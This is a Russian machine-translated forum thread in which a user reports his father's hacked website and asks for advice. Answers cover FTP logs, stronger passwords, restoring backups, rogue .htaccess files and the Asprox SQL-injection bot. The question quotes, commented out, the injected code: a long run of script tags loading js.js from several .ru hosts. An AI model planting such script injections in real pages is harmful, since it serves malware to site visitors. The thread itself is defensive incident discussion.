Мой сайт взломан. Что мне делать?

Мой папа позвонил мне сегодня и сказал, что люди, отправляющиеся на его сайт, получают 168 вирусов, пытающихся загрузить их на свои компьютеры. Он вообще не технический, и создал все это с помощью редактора WYSIWYG.

Я открыл свой сайт и просмотрел исходный код, и была строка Javascript в нижней части источника прямо перед закрывающим тегом HTML. Они включали этот файл (среди многих других): http://www.98hs.ru/js.js < - ВЫКЛЮЧИТЬ JAVASCRIPT ДО ТОГО, ЧТО ВЫ ИДИТЕ ЭТОТ URL.

Итак, я прокомментировал это сейчас. Оказывается, его FTP-пароль был простым словом словаря длиной шесть букв, поэтому мы думаем, что он взломан. Мы изменили его пароль на 8-значную строку без слова (он не пошел бы за фразу, так как он является типом hunt-n-peck).

Я сделал whois на 98hs.ru и нашел, что он размещен на сервере в Чили. На самом деле есть связанный с ним адрес электронной почты, но я серьезно сомневаюсь, что этот человек является виновником. Вероятно, просто какой-то другой сайт, который был взломан...

Я понятия не имею, что делать в этот момент, хотя я никогда раньше не занимался этим. У кого-нибудь есть предложения?

Он использовал простой jane un-secure ftp через webhost4life.com. Я даже не вижу способа сделать sftp на своем сайте. Я думаю, что его имя пользователя и пароль были перехвачены?

Итак, чтобы сделать это более релевантным для сообщества, каковы шаги, которые вы должны предпринять/лучшие практики, которым вы должны следовать, чтобы защитить ваш сайт от взлома?

Для записи, вот строка кода, которая "волшебным образом" добавлена в его файл (и не находится в его файле на его компьютере), я оставил его закомментированным, чтобы убедиться, что он выиграл ' ничего не делаю на этой странице, хотя я уверен, что Джефф защитит это):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

Ответ 1

Попробуйте собрать как можно больше информации. Посмотрите, может ли хост предоставить вам журнал, показывающий все FTP-подключения, которые были сделаны в вашей учетной записи. Вы можете использовать их, чтобы узнать, было ли это даже соединение FTP, которое использовалось для внесения изменений и, возможно, получить IP-адрес.

Если вы используете готовое программное обеспечение, такое как Wordpress, Drupal или что-то еще, что вы не кодировали, могут быть уязвимости в загружаемом коде, который допускает такую модификацию. Если оно выполнено на заказ, дважды проверьте все места, где вы разрешаете пользователям загружать файлы или изменять существующие файлы.

Во-вторых, нужно взять дамп сайта как есть и проверить все на другие модификации. Это может быть только одна модификация, которую они сделали, но если они вошли через FTP, кто знает, что еще там.

Верните свой сайт обратно к известному хорошему состоянию и, при необходимости, обновите его до последней версии.

Существует уровень отдачи, который вы должны учитывать. Является ли ущерб, который стоит попытаться отследить человека, или это то, что вы только что живете, учитесь и используете более сильные пароли?

Ответ 2

Я знаю, что это немного поздно в игре, но URL, упомянутый для JavaScript, упоминается в списке сайтов, которые, как известно, были частью возрождения ботов ASPRox, которые начались в июне (по крайней мере, когда мы были помечается с ним). Некоторые подробности об этом упоминаются ниже:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Отвратительная вещь в том, что эффективно каждое поле типа varchar в базе данных "заражено", чтобы выплескивать ссылку на этот URL-адрес, в котором браузер получает крошечный iframe, который превращает его в бота. Исходное исправление SQL для этого можно найти здесь:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Страшно, однако, что вирус обращается к системным таблицам значений, которые нужно заразить, и многие планы совместного хостинга также разделяют пространство базы данных для своих клиентов. Так что, скорее всего, даже ваш сайт-папа не был заражен, а кто-то еще в своем кластере хостинга, который написал плохой код и открыл дверь для атаки SQL Injection.

Если он еще этого не сделал, я бы отправил URGENT по электронной почте на свой хост и дал им ссылку на этот код SQL, чтобы исправить всю систему. Вы можете исправить свои собственные таблицы базы данных, но, скорее всего, боты, которые делают заражение, снова пройдут через это отверстие и заразят весь участок.

Надеюсь, это даст вам дополнительную информацию для работы.

EDIT: Еще одна мысль: если он использует один из инструментов онлайн-дизайна хостов для создания своего веб-сайта, все это содержимое, вероятно, находится в столбце и было заражено таким образом.

Ответ 3

Вы упомянули, что ваш папа использовал инструмент публикации веб-сайтов.

Если средство публикации публикуется со своего компьютера на сервер, может быть, что его локальные файлы чисты и что ему просто нужно переиздавать на сервер.

Он должен увидеть, есть ли другой метод входа на его сервер, чем простой FTP, хотя... это не очень безопасно, потому что он отправляет свой пароль в виде текстового текста через Интернет.

Ответ 4

С шестизначным символом пароля он, возможно, был жестоко принужден. Это более вероятно, чем его ftp, перехваченный, но это может быть и так.

Начните с более сильного пароля. (8 символов по-прежнему довольно слабы)

Посмотрите, действительно ли эта ссылка на интернет блог безопасности.

Ответ 5

Является ли сайт просто статическим HTML? то есть ему не удалось запрограммировать себе страницу загрузки, которая позволяет кому-либо управлять загрузкой скомпрометированных скриптов/страниц?

Почему бы не спросить webhost4life, если у них есть какие-либо FTP-журналы и сообщить о них. Вы никогда не знаете, они могут быть весьма восприимчивыми и узнать, что именно произошло?

Я работаю для общего хостера, и мы всегда приветствуем такие отчеты, и обычно можем точно определить точный вектор атаки, основываясь на рекомендациях относительно того, где клиент поступил неправильно.

Ответ 6

Отключите веб-сервер, не отключая его, чтобы избежать сценариев завершения работы. Проанализируйте жесткий диск через другой компьютер в качестве накопителя данных и посмотрите, можете ли вы определить виновника через файлы журналов и такие вещи. Убедитесь, что код безопасен, а затем восстановите его из резервной копии.

Ответ 7

Это случилось недавно с моим клиентом, который был размещен на ipower. Я не уверен, была ли ваша среда хостинга основанной на Apache, но если бы она была дважды проверена на файлы .htaccess, которые вы не создали, особенно над веб-корнем и внутри каталогов изображений, поскольку они, как правило, вводят некоторую гадость там (они перенаправляли людей в зависимости от того, откуда они пришли в ссылке). Также проверьте все, что вы создали для кода, который вы не пишете.

Ответ 8

Мы были взломаны от таких же парней, судя по всему! Или ботов, в нашем случае. Они использовали SQL-инъекцию в URL-адресе на некоторых старых классических сайтах ASP, которые больше никто не поддерживает. Мы обнаружили атакующие IP-адреса и заблокировали их в IIS. Теперь мы должны реорганизовать все старые ASP. Итак, мой совет - сначала взглянуть на журналы IIS, чтобы выяснить, есть ли проблема в коде вашего сайта или конфигурации сервера.